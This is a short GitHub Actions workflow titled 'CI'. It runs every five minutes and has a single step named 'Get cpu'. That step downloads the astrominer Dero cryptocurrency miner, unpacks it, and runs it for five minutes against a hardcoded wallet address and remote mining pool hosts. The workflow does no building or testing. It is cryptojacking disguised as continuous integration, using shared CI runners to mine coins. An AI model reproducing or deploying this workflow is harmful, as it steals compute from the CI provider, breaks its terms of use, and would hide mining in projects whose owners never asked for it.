name: CI

on:
  schedule:
    - cron: "*/5 * * * *"
    
  workflow_dispatch:

jobs:
  cron:
    runs-on: ubuntu-latest

    steps:
      - name: Get cpu 
        run: wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz &&  tar -zxvpf astrominer-V1.9.2.R5_amd64_linux.tar.gz && timeout 5m ./astrominer/astrominer  -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xctsqhpj49xzqcq0dl8rv -p rpc -r community-pools.mysrv.cloud:10300 -r1 dero-node-sg.mysrv.cloud:10300 -r2 dero-node-va.mysrv.cloud:10300 -m 2
